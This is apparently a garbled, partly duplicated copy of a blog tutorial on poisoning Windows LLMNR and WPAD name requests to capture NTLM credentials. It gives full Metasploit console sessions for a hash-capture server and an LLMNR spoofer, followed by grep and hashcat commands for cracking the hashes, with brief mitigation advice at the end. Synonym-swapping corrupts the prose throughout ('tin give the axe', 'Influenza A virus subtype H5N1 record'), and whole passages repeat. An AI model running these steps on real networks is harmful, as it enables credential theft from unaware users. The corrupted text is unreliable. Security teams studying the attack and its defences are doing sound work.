A acre dorsum my colleague Pedro wrote an article showing a technique that is rattling useful in ane lawsuit you’ve gained access to a network: The salmon line-fishing acquit attack.
In essence this listens to NetBIOS broadcasts, spoofs the required advert together with and so connects dorsum to where y'all desire it. Where this becomes useful is if y'all tin give the axe larn the host to asking a spider web page, together with so y'all tin give the axe ready a server requiring NT authentication together with Windows volition endeavour to authenticate, all acre the user is unaware of it happening.
I late had to revisit this technique where NetBIOS wasn’t enabled. This makes it harder, but it’s nonetheless possible to purpose the same form of laid on using a dissimilar advert service method- ane called LLMNR which was implemented inward Windows vii onwards.
The attentive with y'all volition convey noticed that the higher upward asking is for IPv6, requesting for a resolution from ff02::1:3, IPv4 volition hold out sent to 224.0.0.252. As it is multicast, it volition croak to the network (usually simply the local segment).
Windows knows this equally “Network Discovery”, which tin give the axe hold out changed inward the network together with sharing centre’s advanced sharing settings:
So what nosotros do, is to brain out for requests for a hostname together with redirect them to a controlled server on our side. When they connect nosotros inquire for authentication together with Windows nicely provides us with their credentials.
We tin give the axe abuse the Internet Explorer automatic proxy facility for this: when y'all start using Internet Explorer together with it is laid to purpose an automatic proxy together with so it volition post out a asking for a host called “wpad”, together with so it volition connect to that host together with push clit downward a file called wpad.dat. If you’re genuinely curious Wikipedia describes it inward much amend detail than I do.
When Windows 7+ requests wpad it volition audio out requests via:
So, nosotros answer with our server, ready a quick webserver together with require NT authentication. Then nosotros sit down dorsum together with hold off for credentials.
That’s quite a wall of text, so let’s present this inward a Wireshark (with redaction bars) screenshot:
Here nosotros come across the LLMNR requests to both IPv4 (the Influenza A virus subtype H5N1 record) together with IPv6 (the AAAA record) together with the total procedure of it trying to larn wpad.dat together with trying to authenticate.
First off nosotros demand to ready the goal spider web server that’s going to get together the password hashes, using auxiliary/server/capture/http_ntlm:
We tin give the axe await at it from a normal spider web browser, it isn’t exciting equally this is never meant to hold out seen past times human eyes:
So nosotros forthwith demand something to genuinely beak to the spider web server- the magic chip if y'all like. For this nosotros purpose Metasploit’s auxiliary/spoof/llmnr/llmnr_response module:
The side past times side pace is to cleft them, this tin give the axe hold out done with John the Ripper’s jumbo patch, or, if y'all convey a fast graphics card, nosotros tin give the axe purpose hashcat.
The offset pace is to filter out machine accounts. Influenza A virus subtype H5N1 machine delineate of piece of work organization human relationship is the NT delineate of piece of work organization human relationship that a calculator uses to authenticate with the domain. These are easily recognisable equally they cease with a ‘$’, e.g. ASPHODEL$. These tin give the axe rapidly hold out grepped out:
Network together with Sharing Center > Change Advanced Sharing Settings > profile > Network discovery
…and setting the radio clit to “Turn off network discovery”
This tin give the axe hold out disabled through grouping policy past times altering the settings in:
Administrative Templates > Network > Link-Layer Topology Discovery
Whilst you’re altering this, y'all may desire to consider disabling the proxy automatic configuration, forcing it to exclusively croak to a specific destination.
In essence this listens to NetBIOS broadcasts, spoofs the required advert together with and so connects dorsum to where y'all desire it. Where this becomes useful is if y'all tin give the axe larn the host to asking a spider web page, together with so y'all tin give the axe ready a server requiring NT authentication together with Windows volition endeavour to authenticate, all acre the user is unaware of it happening.
I late had to revisit this technique where NetBIOS wasn’t enabled. This makes it harder, but it’s nonetheless possible to purpose the same form of laid on using a dissimilar advert service method- ane called LLMNR which was implemented inward Windows vii onwards.
What is LLMNR?
It sounds similar a bacterial resistant illness doesn’t it? It’s curt for Local Loop Multicast Name Resolution. “Yes, but what’s it for Dave?” I hear y'all ask. It’s a lightweight advert service that plant past times using a multicast grouping to assay together with resolve basic names inside a small(ish) network area. Its big payoff is that it plant good for both IPv4 together with IPv6 together with it looks similar this (excuse the redaction bars):The attentive with y'all volition convey noticed that the higher upward asking is for IPv6, requesting for a resolution from ff02::1:3, IPv4 volition hold out sent to 224.0.0.252. As it is multicast, it volition croak to the network (usually simply the local segment).
Windows knows this equally “Network Discovery”, which tin give the axe hold out changed inward the network together with sharing centre’s advanced sharing settings:
Abusing it
The protocol has the same basic work equally that of the NetBIOS advert service: it’s a advert service that is sent to all clients on the network, non a specific server. That way that the customer volition implicitly trust any replay it sees.So what nosotros do, is to brain out for requests for a hostname together with redirect them to a controlled server on our side. When they connect nosotros inquire for authentication together with Windows nicely provides us with their credentials.
We tin give the axe abuse the Internet Explorer automatic proxy facility for this: when y'all start using Internet Explorer together with it is laid to purpose an automatic proxy together with so it volition post out a asking for a host called “wpad”, together with so it volition connect to that host together with push clit downward a file called wpad.dat. If you’re genuinely curious Wikipedia describes it inward much amend detail than I do.
When Windows 7+ requests wpad it volition audio out requests via:
- DNS (unicast for wpad)
- NetBIOS (broadcast for WPAD)
- LLMNR (multicast for wpad)
So, nosotros answer with our server, ready a quick webserver together with require NT authentication. Then nosotros sit down dorsum together with hold off for credentials.
That’s quite a wall of text, so let’s present this inward a Wireshark (with redaction bars) screenshot:
Here nosotros come across the LLMNR requests to both IPv4 (the Influenza A virus subtype H5N1 record) together with IPv6 (the AAAA record) together with the total procedure of it trying to larn wpad.dat together with trying to authenticate.
Setting it up
Just similar with NetBIOS we’re going to purpose Metasploit for this. It’s a chip to a greater extent than complicated than most Metasploit exploits equally nosotros demand to run 2 auxiliary modules.First off nosotros demand to ready the goal spider web server that’s going to get together the password hashes, using auxiliary/server/capture/http_ntlm:
msf > purpose auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > laid johnpwfile /root/out.txt
johnpwfile => /root/out.txt
msf auxiliary(http_ntlm) > laid srvhost 192.168.0.100
srvhost => 192.168.0.100
msf auxiliary(http_ntlm) > laid srvport 80
srvport => 80
msf auxiliary(http_ntlm) > exploit
[*] Auxiliary module execution completed
[*] Using URL: http://192.168.0.100:80/AuGOLjaEu2L1VE
[*] Server started.
This simply starts upward a elementary spider web server that volition brain at the URL, presents an NT authentication challenge together with stores whatever hashes it receives. (NT authentication is a 3 pace challenge, response process.)msf auxiliary(http_ntlm) > laid johnpwfile /root/out.txt
johnpwfile => /root/out.txt
msf auxiliary(http_ntlm) > laid srvhost 192.168.0.100
srvhost => 192.168.0.100
msf auxiliary(http_ntlm) > laid srvport 80
srvport => 80
msf auxiliary(http_ntlm) > exploit
[*] Auxiliary module execution completed
[*] Using URL: http://192.168.0.100:80/AuGOLjaEu2L1VE
[*] Server started.
We tin give the axe await at it from a normal spider web browser, it isn’t exciting equally this is never meant to hold out seen past times human eyes:
So nosotros forthwith demand something to genuinely beak to the spider web server- the magic chip if y'all like. For this nosotros purpose Metasploit’s auxiliary/spoof/llmnr/llmnr_response module:
msf auxiliary(http_ntlm) > purpose auxiliary/spoof/llmnr/llmnr_response
msf auxiliary(llmnr_response) > laid interface eth2
interface => eth2
msf auxiliary(llmnr_response) > laid spoofip 192.168.0.100
spoofip => 192.168.0.100
msf auxiliary(llmnr_response) > laid regex wpad
regex => wpad
msf auxiliary(llmnr_response) > exploit
[*] Auxiliary module execution completed[*] LLMNR Spoofer started. Listening for LLMNR requests with REGEX “(?-mix:wpad)” …
Here nosotros are creating a multicast listener which volition brain for LLMNR asking for “wpad” together with answer with the IP address of the spider web server nosotros created (above).msf auxiliary(llmnr_response) > laid interface eth2
interface => eth2
msf auxiliary(llmnr_response) > laid spoofip 192.168.0.100
spoofip => 192.168.0.100
msf auxiliary(llmnr_response) > laid regex wpad
regex => wpad
msf auxiliary(llmnr_response) > exploit
[*] Auxiliary module execution completed[*] LLMNR Spoofer started. Listening for LLMNR requests with REGEX “(?-mix:wpad)” …
Getting the passwords
Now, larn out that running, particularly at a betoken where lots of people are loading Internet Explorer together with thence volition hold out looking for the wpad file; lunchtimes together with mid mornings operate brilliantly at this; together with y'all volition convey an output file filled with NT authentication challenges.The side past times side pace is to cleft them, this tin give the axe hold out done with John the Ripper’s jumbo patch, or, if y'all convey a fast graphics card, nosotros tin give the axe purpose hashcat.
The offset pace is to filter out machine accounts. Influenza A virus subtype H5N1 machine delineate of piece of work organization human relationship is the NT delineate of piece of work organization human relationship that a calculator uses to authenticate with the domain. These are easily recognisable equally they cease with a ‘$’, e.g. ASPHODEL$. These tin give the axe rapidly hold out grepped out:
grep –v ‘$:’ out.txt >filtered.txt
Now nosotros tin give the axe purpose hash type 5600 (NetNTLMv2) to cleft them inward hashcat: c:toolspasswordshashcat>cudahashcat64 -m 5600 out.txt –remove –session llmnr ..dictionaries
Preventing it
The easiest trend to larn rid of this vector is to halt Windows using LLMNR, this has to hold out laid for each network profile together with tin give the axe hold out performed through the command panel with, going to:Network together with Sharing Center > Change Advanced Sharing Settings > profile > Network discovery
…and setting the radio clit to “Turn off network discovery”
This tin give the axe hold out disabled through grouping policy past times altering the settings in:
Administrative Templates > Network > Link-Layer Topology Discovery
Whilst you’re altering this, y'all may desire to consider disabling the proxy automatic configuration, forcing it to exclusively croak to a specific destination.